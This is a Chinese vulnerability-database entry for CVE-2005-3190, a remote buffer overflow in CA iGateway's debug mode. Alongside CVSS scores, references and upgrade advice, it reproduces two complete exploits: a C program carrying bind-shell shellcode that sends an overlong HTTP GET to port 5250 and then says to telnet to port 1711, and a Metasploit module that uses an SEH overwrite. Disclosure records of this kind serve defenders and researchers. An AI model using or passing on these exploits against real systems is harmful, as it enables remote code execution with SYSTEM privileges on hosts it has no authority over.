CVE-2005-3190
CVSS7.5
发布时间 :2005-10-13 18:02:00
修订时间 :2008-09-05 16:53:41
NMCOE    

[原文]Buffer overflow in Computer Associates (CA) iGateway 3.0 and 4.0 before 4.0.050623, when running in debug mode, allows remote attackers to execute arbitrary code via HTTP GET requests.


[CNNVD]Computer Associates多个产品HTTP请求远程溢出漏洞(CNNVD-200510-074)

        Computer Associates是世界领先的安全厂商,产品包括多种杀毒软件。
        多个Computer Associates产品中存在远程溢出漏洞,起因是没有对用户数据进行正确的边界检查,可能允许攻击者执行任意机器代码。请注意目前还不清楚具体有哪些产品存在漏洞,因此将所有Computer Associates产品都列为受影响产品。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:ca:igateway:3.0Computer Associates iGateway 3.0
cpe:/a:ca:igateway:4.0Computer Associates iGateway 4.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3190
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3190
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200510-074
(官方数据源) CNNVD

- 其它链接及资源

http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33485
(VENDOR_ADVISORY)  CONFIRM  http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33485
http://xforce.iss.net/xforce/xfdb/22560
(UNKNOWN)  XF  brightstor-igateway-http-get-bo(22560)
http://www.securityfocus.com/bid/15025
(UNKNOWN)  BID  15025
http://www.osvdb.org/19920
(UNKNOWN)  OSVDB  19920
http://securitytracker.com/id?1015045
(UNKNOWN)  SECTRACK  1015045
http://securityreason.com/securityalert/86
(UNKNOWN)  SREASON  86
http://secunia.com/advisories/17085
(UNKNOWN)  SECUNIA  17085
http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0418.html
(UNKNOWN)  FULLDISC  20051019 RE: CAID 33485 - Computer Associates iGateway debug mode HTTP GET request buffer overflow vulnerability
http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0349.html
(UNKNOWN)  FULLDISC  20051014 CAID 33485 - Computer Associates iGateway debug mode HTTP GET request buffer overflow vulnerability

- 漏洞信息

Computer Associates多个产品HTTP请求远程溢出漏洞
高危 缓冲区溢出
2005-10-13 00:00:00 2005-10-20 00:00:00
远程  
        Computer Associates是世界领先的安全厂商,产品包括多种杀毒软件。
        多个Computer Associates产品中存在远程溢出漏洞,起因是没有对用户数据进行正确的边界检查,可能允许攻击者执行任意机器代码。请注意目前还不清楚具体有哪些产品存在漏洞,因此将所有Computer Associates产品都列为受影响产品。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://www.cai.com/

- 漏洞信息 (1243)

CA iGateway (debug mode) Remote Buffer Overflow Exploit (EDBID:1243)
windows remote
2005-10-10 Verified
5250 egm
N/A [点击下载]
/*ca igateway debug remote overflow -egm erikam@gmail.com*/
/*01.30.05*/
#include <stdio.h>
#include <winsock2.h>
#include <errno.h>
#include <windows.h>

const int MAXSIZE = 17110;

char sc[] = //metasploit
"\x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3d\x19\x6d"
"\xf7\x83\xeb\xfc\xe2\xf4\xc1\x73\x86\xba\xd5\xe0\x92\x08\xc2\x79"
"\xe6\x9b\x19\x3d\xe6\xb2\x01\x92\x11\xf2\x45\x18\x82\x7c\x72\x01"
"\xe6\xa8\x1d\x18\x86\xbe\xb6\x2d\xe6\xf6\xd3\x28\xad\x6e\x91\x9d"
"\xad\x83\x3a\xd8\xa7\xfa\x3c\xdb\x86\x03\x06\x4d\x49\xdf\x48\xfc"
"\xe6\xa8\x19\x18\x86\x91\xb6\x15\x26\x7c\x62\x05\x6c\x1c\x3e\x35"
"\xe6\x7e\x51\x3d\x71\x96\xfe\x28\xb6\x93\xb6\x5a\x5d\x7c\x7d\x15"
"\xe6\x87\x21\xb4\xe6\xb7\x35\x47\x05\x79\x73\x17\x81\xa7\xc2\xcf"
"\x0b\xa4\x5b\x71\x5e\xc5\x55\x6e\x1e\xc5\x62\x4d\x92\x27\x55\xd2"
"\x80\x0b\x06\x49\x92\x21\x62\x90\x88\x91\xbc\xf4\x65\xf5\x68\x73"
"\x6f\x08\xed\x71\xb4\xfe\xc8\xb4\x3a\x08\xeb\x4a\x3e\xa4\x6e\x4a"
"\x2e\xa4\x7e\x4a\x92\x27\x5b\x71\x6b\x58\x5b\x4a\xe4\x16\xa8\x71"
"\xc9\xed\x4d\xde\x3a\x08\xeb\x73\x7d\xa6\x68\xe6\xbd\x9f\x99\xb4"
"\x43\x1e\x6a\xe6\xbb\xa4\x68\xe6\xbd\x9f\xd8\x50\xeb\xbe\x6a\xe6"
"\xbb\xa7\x69\x4d\x38\x08\xed\x8a\x05\x10\x44\xdf\x14\xa0\xc2\xcf"
"\x38\x08\xed\x7f\x07\x93\x5b\x71\x0e\x9a\xb4\xfc\x07\xa7\x64\x30"
"\xa1\x7e\xda\x73\x29\x7e\xdf\x28\xad\x04\x97\xe7\x2f\xda\xc3\x5b"
"\x41\x64\xb0\x63\x55\x5c\x96\xb2\x05\x85\xc3\xaa\x7b\x08\x48\x5d"
"\x92\x21\x66\x4e\x3f\xa6\x6c\x48\x07\xf6\x6c\x48\x38\xa6\xc2\xc9"
"\x05\x5a\xe4\x1c\xa3\xa4\xc2\xcf\x07\x08\xc2\x2e\x92\x27\xb6\x4e"
"\x91\x74\xf9\x7d\x92\x21\x6f\xe6\xbd\x9f\xcd\x93\x69\xa8\x6e\xe6"
"\xbb\x08\xed\x19\x6d\xf7";

int tcp_connect(char *host,int port) {

struct hostent *hp;
struct sockaddr_in addr;
int sock;

if (!(hp=gethostbyname(host))){
fprintf(stderr,"Something died! \n");
return -1;
}

memset(&addr,0,sizeof(addr));
addr.sin_addr=*(struct in_addr*)hp->h_addr;
addr.sin_family=AF_INET;
addr.sin_port=htons(port);

if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0){
fprintf(stderr,"Dead again!\n");
return -1;
}

if((connect(sock,(struct sockaddr *)&addr,sizeof(addr)))<0){
fprintf(stderr,"Dead once more! \n");
return -1;
}
return sock;
}

/*Just supply a target ./caigw-win32 hostname */
int main(int argc, char *argv[])
{
char buffer[MAXSIZE+1];
int i = 0;
int sclen = sizeof(sc), sock = 0;

if(!argv[1])
return 0;

memset(buffer,'\x90',MAXSIZE/2);

memcpy(buffer,"GET",3);

for(i=3;i<24;i++)
memcpy(buffer+i," ",1);
for(i=21;i<423;i++)
buffer[i] = 'A';

/* XP SP2*/ 
//memcpy(buffer + 423+25,"\xdd\x10\x12\x12",4);
/*W2ksp4 */
memcpy(buffer + 422+25,"\xdd\x10\x12\x12",4);

memcpy(buffer + 460,sc,sclen - 1);
memcpy(buffer + (460 + sclen)," HTTP/1.0\r\n\r\n\r\n",16);
buffer[460+sclen+20] = '\0';

if( (sock = tcp_connect(argv[1],5250)) != -1 )
{
int bytes = 0;

printf("[~] Sending request... \n");
bytes = send(sock,buffer,strlen(buffer),0);
printf("[!] Sent [%d] bytes\n",bytes);
}
else 
return -1;

close(sock);
sleep (2);

printf("[@] Now telnet to port 1711\n");
return 0;
}

// milw0rm.com [2005-10-10]
		

- 漏洞信息 (16801)

CA iTechnology iGateway Debug Mode Buffer Overflow (EDBID:16801)
windows remote
2010-04-30 Verified
5250 metasploit
N/A [点击下载]
##
# $Id: ca_igateway_debug.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'CA iTechnology iGateway Debug Mode Buffer Overflow',
			'Description'    => %q{
					This module exploits a vulnerability in the Computer Associates
				iTechnology iGateway component. When <Debug>True</Debug> is enabled
				in igateway.conf (non-default), it is possible to overwrite the stack
				and execute code remotely. This module works best with Ordinal payloads.
			},
			'Author'         => 'patrick',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9179 $',
			'References'     =>
				[
					[ 'CVE', '2005-3190' ],
					[ 'OSVDB', '19920' ],
					[ 'URL', 'http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=33485' ],
					[ 'URL', 'http://www.milw0rm.com/exploits/1243' ],
					[ 'BID', '15025' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'seh',
				},
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00\x0a\x0d\x20",
					'StackAdjustment' => -3500,
					'Compat'   =>
					{
						'ConnectionType' => '+ws2ord',
					},
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'iGateway 3.0.40621.0', { 'Ret' => 0x120bd9c4 } ], # p/p/r xerces-c_2_1_0.dll
				],
			'Privileged'     => true,
			'DisclosureDate' => 'Oct 06 2005',
			'DefaultTarget'  => 0))

		register_options(
			[
				Opt::RPORT(5250),
			], self.class)
	end

	def check
		connect
		sock.put("HEAD / HTTP/1.0\r\n\r\n\r\n")
		banner = sock.get(-1,3)

		if (banner =~ /GET and POST methods are the only methods supported at this time/) # Unique?
			return Exploit::CheckCode::Detected
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		seh = generate_seh_payload(target.ret)
		buffer = Rex::Text.rand_text_alphanumeric(5000)
		buffer[1082, seh.length] = seh
		sploit = "GET /" + buffer + " HTTP/1.0"

		sock.put(sploit + "\r\n\r\n\r\n")

		disconnect
		handler
	end
end
		

- 漏洞信息

19920
CA iGateway Debug Mode HTTP GET Request Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public

- 漏洞描述

A remote overflow exists in Computer Associates iGateway. The application fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted HTTP GET request, a remote attacker can cause arbitrary code execution with SYSTEM privileges resulting in a loss of integrity.

- 时间线

2005-10-10 2005-10-06
2005-10-17 Unknow

- 解决方案

Upgrade to version 4.0.050623 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站